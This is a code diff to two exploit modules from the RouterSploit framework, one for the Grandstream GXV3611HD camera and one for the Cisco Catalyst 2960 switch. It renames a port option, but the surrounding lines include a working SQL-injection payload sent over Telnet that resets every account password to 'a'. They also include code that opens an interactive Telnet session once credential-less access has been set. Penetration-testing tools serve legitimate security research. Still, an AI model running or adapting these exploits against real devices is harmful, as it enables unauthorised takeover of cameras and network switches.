diff --git a/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_rce.py b/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_rce.py
index c6a25b9..8256214 100644
--- a/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_rce.py
+++ b/routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_rce.py
@@ -27,14 +27,14 @@ class Exploit(exploits.Exploit):
     }
 
     target = exploits.Option('', 'Target IP address e.g. 192.168.1.1')  # target address
-    port = exploits.Option(23, 'Target port')  # default port
+    telnet_port = exploits.Option(23, 'Target port')  # default port
 
     def run(self):
         if self.check():
             print_success("Target appears to be vulnerable...")
 
             try:
-                conn = telnetlib.Telnet(self.target, self.port)
+                conn = telnetlib.Telnet(self.target, self.telnet_port)
                 conn.read_until("Username: ")
                 conn.write("';update user set password='a';--\r\n")  # This changes all the passwords to 'a'
                 conn.read_until("Password: ")
@@ -70,7 +70,7 @@ class Exploit(exploits.Exploit):
     @mute
     def check(self):
         try:
-            conn = telnetlib.Telnet(self.target, self.port)
+            conn = telnetlib.Telnet(self.target, self.telnet_port)
             return 'Grandstream' in conn.read_until("login:")
         except Exception:
             return False
diff --git a/routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py b/routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
index b94ddf6..c1ec92b 100644
--- a/routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
+++ b/routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
@@ -38,7 +38,7 @@ class Exploit(exploits.Exploit):
     }
 
     target = exploits.Option('', 'Target IP address', validators=validators.ipv4)
-    port = exploits.Option(23, 'Target Port', validators=int)
+    telnet_port = exploits.Option(23, 'Target Port', validators=validators.integer)
 
     action = exploits.Option('set', 'set / unset credless authentication for Telnet service')
     device = exploits.Option(-1, 'Target device - use "show devices"', validators=int)
@@ -180,11 +180,11 @@ class Exploit(exploits.Exploit):
             print_error("Specify action: set / unset credless authentication for Telnet service")
             return
 
-        print_status("Trying to connect to Telnet service on port {}".format(self.port))
+        print_status("Trying to connect to Telnet service on port {}".format(self.telnet_port))
 
         try:
             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-            s.connect((self.target, int(self.port)))
+            s.connect((self.target, int(self.telnet_port)))
 
             print_status("Connection OK")
             print_status("Received bytes from telnet service: {}".format(repr(s.recv(1024))))
@@ -209,7 +209,7 @@ class Exploit(exploits.Exploit):
         if self.action == 'set':
             print_status("Connecting to Telnet service...")
             try:
-                t = telnetlib.Telnet(self.target, int(self.port))
+                t = telnetlib.Telnet(self.target, int(self.telnet_port))
                 t.interact()
             except:
                 print_error("Exploit failed")